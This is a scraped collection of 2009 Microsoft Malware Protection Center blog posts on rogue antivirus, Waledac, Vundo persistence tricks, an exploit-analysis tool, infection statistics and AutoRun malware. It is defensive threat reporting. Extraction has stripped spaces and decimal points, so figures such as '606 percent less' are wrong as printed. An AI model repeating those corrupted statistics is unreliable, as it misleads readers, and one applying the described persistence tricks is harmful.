morewidespread, we saw rogues get more sophisticated and aggressiveThere were two families that really exemplified the state of rogues in2H08 - Win32/FakeSecSen and Win32/FakeXPA These rogues were found onover 15 million computers each over the six month periodWin32/FakeSecSen cloaked itself in many disguises, with names like "MSAntivirus", "Vista Antivirus 2008" and "Windows Antivirus 2008"combined with user interfaces that often imitated the look of theWindows Security CenterIMAGEWin32/FakeXPA took this idea a step further, introducing a completeimitation of the Windows Security Center, tailored to the version ofWindows it was run on, as well as fake "blue screen" crash messages,all of which insisted that the rogue which called itself "Antivirus2010" in some cases should be registeredIMAGEVinny talked about the number one threat we saw worldwide -Win32/Renos - a threat that was found on 44 million distinctcomputers Behind this huge number was an increasingly sophisticatedarray of malware distribution techniques including spam, exploitstargeting browsers and third party add-ons like Adobe flash, andmultiple levels of redirection through compromised web sites Thesewere often combined with social engineering techniques including fakeonline scanners and product pages that were increasingly convincing atselling the rogues as legitimate applicationsYou can find more details on rogues in the SIR In particular, itincludes a description about the legal fight against the people whodistribute these applications--Hamish O'DeaIMAGEhttp://www.secuobs.com/revue/news/89797.shtmlhttp://www.secuobs.com/revue/news/89797.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Customers often look for information about malware that may affectthem For the last couple of years, we have shown that malware doesn’tspread evenly across the globe, despite the global nature of theInternet Threats that rely on social engineering, are not equallyeffective in different parts of the world due to language barriers orcultural factors Also sometimes the malware spreads using exploits inapplications which also are unevenly distributed around the world TheMicrosoft Security Intelligence Report SIR volume 6 which wasreleased last Wednesday, provides lots of information about theseaspects The following chart from the SIR compares the prevalence ofdifferent categories of malware and Potentially Unwanted Software insome of the world’s biggest economies The SIR provides examples formany of these differences For example, it discusses the passwordstealers that spread using emails in Portuguese that target onlineusers mostly in Brazil, where Portuguese is spokenScreen shot of figure 43 that shows the threat landscape WW and in eight of the biggest economiesThe SIR also measures the infection rate around the world using thetelemetry data we get from our different antimalware products, and inparticular from the MSRT Here’s the global heatmap that we createdusing telemetry from this tool:IMAGEThe SIR even provides the infection rate for 215 different countriesand regions during the second half of 2008 see page 134 Some of thecountries/regions with the highest infection rates are Serbia andMontenegro, Russia, Brazil, Turkey and Spain while some of thecountries/regions with the lowest infection rates are Vietnam,Philippines, Macao SAR ,Japan and Morocco:Screen shot of figure 46 and 47 with the list of most infected countries and least infected countriesIn addition to that, the SIR includes specific analysis of the threatlandscape during the second half of year 2008, in the followingcountries: Australia, Brazil, Canada, France, Germany, Italy,Malaysia, Mexico, Norway, Russia, UK and the US For example in theUS, several of the most prevalent families, Win32/Renos, Win32/FakeXPA,Win32/FakeSecSen, Win32/Antivirus2008 and Win32/Winfixer, are eitherrogue security software or malware that downloads such software Thistype of threats has greatly increased during that periodScreen shot of figure 122 that shows the breakdown of threats categories in the US The document also examines the system locale of computers wherevarious exploits happened, and locations of servers that hostsmalware, phishing or drive-by exploits We even provided thedistribution within the US for some of these cases:IMAGESo there’s great information there that you might find useful Here’sthe link: wwwmicrosoftcom/SIRZiv MadorMicrosoft Malware Protection CenterIMAGEhttp://www.secuobs.com/revue/news/89796.shtmlhttp://www.secuobs.com/revue/news/89796.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - The family added to the April MSRT release is Win32/Waledac If youhaven't heard of the family before, there is a chance you may haveseen some of the spam generated by Win32/Waledac in your inbox We'veblogged about some of the spam campaigns in the past, such as FakeObama or the Valentine Devkit The most recent spam campaign uses afake “Reuters Terror Attack” themed lureReuters Terror Attack:Fake Reuters Terror AttackWin32/Waledac is a complex spam bot It also has the ability todownload and execute arbitrary files, harvest email addresses from thelocal machine, perform denial of service attacks, proxy networktraffic and sniff passwords Having leapt into the spotlight inDecember of 2008 as a result of a large Christmas holiday e-card spamcampaign A number of functional and superficial similarities with theinfamous Nuwar spambot aka the “Storm” worm led many to conclude- correctly, that Waledac was the next generation implementation Sowhere did Waledac come fromThe first variant which drew the attention of the MMPC was foundnearly nine months prior to this event, in the first week of April2008 This early version of Waledac was disseminated via the verymechanism which also delivered Nuwar to a machine Interestingly, thesame mechanism was also employed during the development of the Nuwarconstituent components The earliest record of the Waledacdevelopmental “cross-grade” that the MMPC was able to establish wasthe 25th December 2007 This demonstrates that Waledac was indevelopment for at least one year before the Christmas “show”An early variant of Waledac, demonstrating the family name derivation:ScreenshotWaledac employs an ‘affiliate’ or partner if you will basedinstallation scheme For example, the MMPC has observed malware suchas Win32/Bredolab download and install Waledac Bredolab is notoriousfor installing prevalent spam bots such as Rustock, Cutwail, Srizbi,Tedroo and RlsloupA simple reminder to exercise caution with links to web pages that youreceive from unknown sources, especially if the links are to a Webpage that you are not familiar with, unsure of the destination of, orsuspicious of Websites hosting Waledac have employed browserexploits, so malicious software may be installed on your system simplyby visiting a Web page with harmful contentWe’ll keep you posted as more information comes to hand--Scott MolenkampIMAGEhttp://www.secuobs.com/revue/news/89795.shtmlhttp://www.secuobs.com/revue/news/89795.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Paladin describes a set of internal tools that automate the steps aresearcher would take to understand how a given exploit takesadvantage of a given vulnerability As of today, these tools are notfor public consumptionThese tools take as input a vulnerable program and an exploit Thetools run the exploit against the vulnerable program and generate anoutput a file This output file characterizes how the exploit puts thevulnerable program into a malicious stateA vulnerable program is in a malicious state when an exploit:1 supplies an argument to a critical function like exec,2 directs the program counter to execute code of the exploit’schoosing,3 overwrites memory so the program counter executes the exploitcode itself,4 causes an exception forcing the program to terminateThese four states encompass a large set of how vulnerabilities insoftware are exploitedOur automated vulnerability analysis tools are composed of a binarytranslator and data flow tracker The binary translator works with thedata flow tracker to dynamically track the exploit bytes entering avulnerable program’s address space and propagating throughout theaddress space during program execution Whenever these exploit bytesare used to produce one of the four above conditions, execution ishalted and automated analysis is completeAn example:Stack based overflow in an Image Viewer program occurs when a field inan image file exceeds a fixed sized buffer limitThe interesting portions of the characterizing output log of thisImage Viewer vulnerability are as follows:1 The initial tracking of the exploit as it enters the programspace of Image Viewer The Image Viewer program opens up themalicious file to render The log file records the system callused to open up the file and then keeps track of the file contentsby setting a range of taint values in the data flow trackerNtCreateFile: C:POCpocemfSetTaint: Base=9c608 Len=2a8Range 9c6089c8af set to = 22a92 Next as the Image Viewer program is operating on the contents ofthe graphics file pocemf, the data flow tracker propagates theinitial taint in its internal data structures to mirror what ishappening in the Image Viewer program space Any x86 instructionthat moves the exploit bytes to different locations in memory orregisters is recorded into the log file Below shows a moveinstruction which transfers bytes 0x6 though 0x9 in the pocemffile from a location in memory into the ecx registerMov rm32, rm32EIP 0x4eca6c71 ESP: 0x23efc64 TID: 0x768Op1: 0x4 Dirty: 0x6, 0x7, 0x8, 0x9Op2: 0x23efd2c Dirty: 0x6, 0x7, 0x8, 0x93 When the Image Viewer program succumbs to one of the four abovestates an alert is generated, execution is stopped and the logfile is closedAlert dirty jmp/call pointer at EIP 0x77f20ffePosR10: 0x0, PosR11: 0x0, PosR12: 0x0, PosR13: 0x0PosR20: 0x8a, PosR21: 0x8b, PosR22: 0x8c, PosR23: 0x8d0x8a describes the offset in the pocemf whose bytes influencedthe program counter This is a malicious condition because theprogram counter of the Image Viewer program has been hijacked bythe exploit The program counter points to a location defined bythe exploitThe automatically generated log file provides the followinginformation to the researcher:1 How the exploit was received into the vulnerable program’saddress space2 In what manner the exploit compromised the vulnerable programSpecifically what bytes in the exploit led to a compromised state3 Describes the path from the initial receive of the exploit to thepoint of comprise4 If two separate exploits are identical in terms of exploiting thesame vulnerability in the same mannerTo obtain the above information in a matter of seconds is a large winfor a researcher and just part of an arsenal of tools that willdeliver scalable automated vulnerability analysis- MMPC Vulnerability Response TeamIMAGEhttp://www.secuobs.com/revue/news/89794.shtmlhttp://www.secuobs.com/revue/news/89794.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - It’s pretty obvious that people often behave differently at home andat work Microsoft has found that malware and potentially unwantedsoftware are encountered differently and act differently in the twoenvironmentsThe following graph shows the difference between the categories ofthreats encountered by Windows Live OneCare users, which is for homeuse, and Forefront Client Security, which is designed to be managed atwork At work, computers are more likely to encounter self-replicatingthreats like worms that can capitalize on the highly interconnectedcomputers At home, threats are more likely to use social engineeringand Trojan horse trickery or browser-based exploitsCool SIR graph of OC vs FCS categoriesThe top 10 reported threat families reported by Windows Live OneCarein the last six months of 2008 is dominated by Trojan threats Amongthese are two rogue threats FakeXPA and Antivirus2008, and the Renosfamily that may deliver these rogues We use our home computers formore web browsing and entertainment than at work, and threatsaffecting home machines often employ tricky techniques called “socialengineering” to infect machinesFascinating SIR graph of OC top 10 familiesAt work, self-replicating worms dominate the list Most computers atwork are connected to a network with lots of other computers, and thistrusted network gives a worm that infects a single machine has achance to spread all over the network Perhaps most interesting onthis list is the Taterf and Frethog families – these steal gamingpasswords, which they probably aren’t finding too much at workHowever, because of the way they spread, they’re more successful inmoving around enterprises than home machinesRiveting SIR graph of FCS top 10 familiesThe notorious Conficker worm is similarly very dangerous at work,while being far more rare on home computersLuckily, the some of the same protection steps work both at home andat work: Update all your software to the latest, most secure versions,and run an up to date antivirus solution – threats love exploitingvulnerabilities to take over computers that have no antivirus andaren’t up-to-date on their patchesPlease read the latest Microsoft Security Intelligence Report atwwwmicrosoftcom/SIR for more details on the difference between homeand work threats--Joe FaulhaberIMAGEhttp://www.secuobs.com/revue/news/89793.shtmlhttp://www.secuobs.com/revue/news/89793.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - The MSRT added the following threat families in 2H08 Rogues andbotnet malware were the focus during the six monthsNew FamilyNoteAdded inComputers Cleaned by the MSRT in 2H08Win32/HorstCAPTCHA breaking threatJuly235,318Win32/MatcashDownloaderAugust217,610Win32/SlenfbotIRC botSeptember598,178Win32/RustockRootkit spam botOctober183,858Win32/FakeSecSecRogue AVNovember1,205,329Win32/FakeXPARogue AVDecember460,931Win32/YektelRogue AVDecember201,635This cleaning tool is deployed to 450 million Windows machines everymonth through Windows Update WU and Automated Update AU It is oneof the major data sources for the Security Intelligence Report SIRAt Microsoft when it comes to decide what new threat families to beincluded by MSRT we analyze the threat prevalence, the impact to theecosystem, to the Windows users and to our partners In 2009 we addedBanload, Conficker, Srizbi, Koobface and Waledac to the MSRT We alsotake requests from our colleagues in the industry as Jeff Williamsmentioned in his Koobface blog where the recent cooperation withFacebook was a good successMSRT is not the only data source for the SIR Combining MSRT withother Microsoft products and tools, Microsoft observed the followingtop 25 threat families worldwide Besides the rogue related threatfamilies, online game password stealers PWS are also very notable onthe list – Taterf, Frethog, Lolyda, Tilcun are all game PWSIMAGEFor more information about malware and potentially unwanted software,or other Microsoft security intelligence please visitwwwmicrosoftcom/SIR--Scott WuIMAGEhttp://www.secuobs.com/revue/news/89792.shtmlhttp://www.secuobs.com/revue/news/89792.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Depending on your background, you may find different sections of thenewly published Microsoft Security Intelligence Report SIR to be ofmore interest In today’s post, we would like to highlight the sectionon infection rates based on the operating system OS version and theservice pack level Microsoft has consistently observed that machineswith newer OS and with more recent service packs are less likely to beinfected by malware The graph below shows the number of computershaving malware removed per 1,000 executions of the MSRT on that OS/SPduring the second half of 2008 2H08IMAGEIn the SIR, you will find the the following conclusions based on thisdata:* The infection rate for Windows Vista is significantly lower thanthat of its predecessor, Windows XP, in all configurations* Comparing the latest service packs for each version, the infectionrate of Windows Vista SP1 is 606 percent less than that ofWindows XP SP3* Comparing the RTM versions of these operating systems, theinfection rate of the RTM version of Windows Vista is 891 percentless than that of the RTM version of Windows XP* The infection rate of Windows Server 2008 RTM is 526 percent lessthan that of its predecessor, Windows Server 2003 SP2* The higher the service pack level, the lower the rate ofinfection This trend can be observed consistently across clientand server operating systems There are two reasons for this:* Service packs include all previously released security updatesThey can also include additional security features, mitigations,or changes to default settings to protect users* Users who install service packs generally maintain their computersbetter than users who do not install service packs and may also bemore cautious in the way they browse the Internet, openattachments, and engage in other activities that can opencomputers to attack* Server versions of Windows typically display a lower infectionrate on average than client versions Servers tend to have a lowereffective attack surface than computers running client operatingsystems as they are more likely to be used under controlledconditions by trained administrators and to be protected by one ormore layers of security In particular, Windows Server 2003 itssuccessors are hardened against attack in a number of ways,reflecting this difference in usageThis data shows that regularly deploying service packs can help reducethe risk of malware and deploying newer versions of operating systemcan help further reduce the infection rate We hope this informationis useful for youScott WuIMAGEhttp://www.secuobs.com/revue/news/89791.shtmlhttp://www.secuobs.com/revue/news/89791.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Vundo is a malware family that doesn't need any introduction It was oneof the families added into the MSRT and remains in the top 10detections every monthIt is commonly reported as a nuisance due to the incessant popups thatit delivers to the user desktop--mostly related to rogue programs;slowing down the user's internet connection considerablyVundo is well known for its resistance to removal by most anti-virusproducts One of the methods it uses is hooking the Appinit_Dlls, orLoadAppInit_DLLs for Windows Vista operating systems This will causeevery process using user32dll which doesn't to load the dllslisted in this registry key into the process memory Another trick ituses is to add itself to PendingFileRenameOperations registry keyThis basically marks the dll to be renamed to another random name uponreboot So if the file was marked to be deleted by an AV product forexample, upon reboot it would have been renamed and would not bedeleted You'll be happy to know that our products are able tomitigate all these tricksRecently, we found new variants that employ replicating behavior bycopying itself to mapped drives on the infected machine It eithercopies itself into the mapped drive's root directory as a random dllname, or it creates a random directory name and copies the dll inthere with the same name This variant is named Worm:Win32/VundoA Weoften advise customers to clean machines infected with Vundo offlineand reboot afterwards because the process in memory can download thefile again even if the malware was deleted sucessfully Given this newbehavior, if you think that you're infected with a new variant ofVundo, try disconnecting from the network before scanning your system--Jaime WongIMAGEhttp://www.secuobs.com/revue/news/89790.shtmlhttp://www.secuobs.com/revue/news/89790.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - --Rdy all--Mode -AP--Starting in 5--4--3--2--1This is the typical scene in DOTA before a game startsDOTA Defense of the Ancients is a very popular custom- made scenariomap for Warcraft III Popular enough that there is even a hit songnamed after itDOTA is usually played online with two teams against each other withat most five players on each side Each player selects from a range ofheroes with unique skills The goal of the game is to destroy theopponent's baseEven though this is not an MMORPG game, hundreds of thousands ofplayers are still hooked to this gameBecause of its popularity, a lot of cheats, including map hacks,emerged Map hacks in DOTA are cheat programs that enable the playerto see everyone, including opponents, in the game A player who wantsto cheat would typically search for map hacks so as to have anadvantage in the gameDOTA hot keys are programs used to save combinations of key strokesThey are popular because in the game, it is an advantage to be able topress certain key combinations faster and with greater accuracyNowadays, even DOTA is also targeted by malware writers through socialengineering We recently found several samples relating to DOTA; somemimicking the Warcraft III Frozen Throne icon, others pretending to beDOTA map hacks and even hot keysMalware that we have found related to DOTA are usually log sniffersand backdoor trojans belonging to the TrojanSpy:Win32/Logsnif andBackdoor:Win32/PcClient familiesIronic that downloading programs that allow you to cheat in a game mayresult in a hacker cheating you for something more valuablePlay fair, play safeGL et HFGood Luck and Have Fun--Francis et EldaIMAGEhttp://www.secuobs.com/revue/news/89789.shtmlhttp://www.secuobs.com/revue/news/89789.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - AutoRun is the ability for a device, through the use of autoruninf,to expose a set of tasks for the user to choose upon insertion of newmedia into the computer This could be a USB drive, a CD or DVD, anetwork drive, or any other additions of new media The user is shownthe AutoRun tasks along with other functions via the AutoPlay dialogAbout a decade ago, diskette use started to wane Machines began tonot include diskette drives anymore And diskette viruses wereeffectively removed from the malware landscape Today, USB media haveappeared and are taking on the same role In today’s malwarelandscape, AutoRun malware has dramatically increased in popularityThe following chart highlights the increase in the number of differentmalware samples we have come across in our lab that are detected asWorm:Win32/Autorun:IMAGEEach quarter, we deal with close to a quarter million such samplesAdditionally, the WildList Organization WLO produces a monthly listof viruses confirmed to be spreading among worldwide users Theircount of Worm:Win32/Autorun confirmed samples also shows a significantincreaseIMAGEThe numbers are smaller because the WLO has to collect, coordinate,and validate disparate contributions from many different vendors andonly lists those confirmed by more than one industry contributor Butthe dramatic rise is the sameThe recent Conficker worm is another of the many AutoRun pieces ofmalware that use this infection vector It uses the additional conceptof AutoPlay to confuse users and trick them into picking the incorrectoption Without closely studying the difference between the twochoices, there is the possibility that users will select the firstchoice, which executes a copy of the wormIMAGESo, due to this rise in malware usage of the AutoRun system, theWindows 7 team has undertaken a dramatic step to block this specificthreatThe new changes will no longer expose the AutoRun entries in thedialog unless it is removable optical media CD/DVDs So, if a USBdrive is inserted into a machine, the AutoRun choice will no longer beshown In addition, changes have been implemented to help clarifyactions about to be undertaken by the AutoPlay dialogWe encourage you to update your systems to take advantage of this newfunctionality We also hope AutoRun malware succumbs to this change inbasic computer architecture, much as diskette viruses were defeated bythe change in user habitsTo read more about the details of this new implementation, please seeEngineering Windows 7: Improvements to AutoPlay-- Jimmy Kuo et Huzefa MogriIMAGEhttp://www.secuobs.com/revue/news/89788.shtmlhttp://www.secuobs.com/revue/news/89788.shtml